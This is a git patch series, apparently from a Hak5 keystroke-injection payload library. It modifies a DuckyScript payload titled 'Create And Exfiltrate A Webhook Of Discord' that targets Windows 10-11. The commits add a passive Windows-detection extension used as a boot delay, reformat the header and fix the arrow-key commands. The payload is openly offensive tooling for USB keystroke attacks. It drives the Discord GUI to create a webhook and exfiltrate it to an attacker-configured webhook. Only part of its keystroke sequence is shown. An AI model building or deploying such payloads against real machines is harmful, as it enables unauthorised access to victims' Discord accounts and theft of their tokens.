From 40da51da72c13347756c238044b7decc41748699 Mon Sep 17 00:00:00 2001 From: Aleff Date: Fri, 30 Aug 2024 10:33:40 +0200 Subject: [PATCH 1/2] [+] PASSIVE_WINDOWS_DETECT --- .../payload.txt | 45 ++++++++++++++++++- 1 file changed, 43 insertions(+), 2 deletions(-) diff --git a/payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/payload.txt b/payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/payload.txt index 8c26e38c7..8ab42f3b7 100644 --- a/payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/payload.txt +++ b/payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/payload.txt @@ -8,18 +8,59 @@ REM # Target : Windows 10-11 | REM # | REM ############################################################### - REM Requirements: REM - Internet connection REM - Discord Installed - REM You must define the Discord server name i.e. Hak5 DEFINE #SERVER_NAME example REM You must define your Discord webhook if you want to use this method for the exfiltration DEFINE #DISCORD_WEBHOOK example +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION + REM Open Discord app GUI DELAY 1000 From 7749aa95c1318b13d31c291f94cc0914a399f962 Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 2 Sep 2024 09:50:42 +0200 Subject: [PATCH 2/2] DOWNARROW Error --- .../payload.txt | 27 ++++++++++--------- 1 file changed, 15 insertions(+), 12 deletions(-) diff --git a/payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/payload.txt b/payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/payload.txt index 8ab42f3b7..37abc84a2 100644 --- a/payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/payload.txt +++ b/payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/payload.txt @@ -1,12 +1,15 @@ -REM ############################################################### -REM # | -REM # Title : Create And Exfiltrate A Webhook Of Discord | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Exfiltration | -REM # Target : Windows 10-11 | -REM # | -REM ############################################################### +REM_BLOCK +############################################################### +# # +# Title : Create And Exfiltrate A Webhook Of Discord # +# Author : Aleff # +# Version : 1.0 # +# Category : Exfiltration # +# Target : Windows 10-11 # +# # +############################################################### +END_REM + REM Requirements: REM - Internet connection @@ -115,11 +118,11 @@ TAB DELAY 500 TAB DELAY 500 -DOWN_ARROW +DOWNARROW DELAY 500 -DOWN_ARROW +DOWNARROW DELAY 500 -DOWN_ARROW +DOWNARROW DELAY 500 ENTER DELAY 500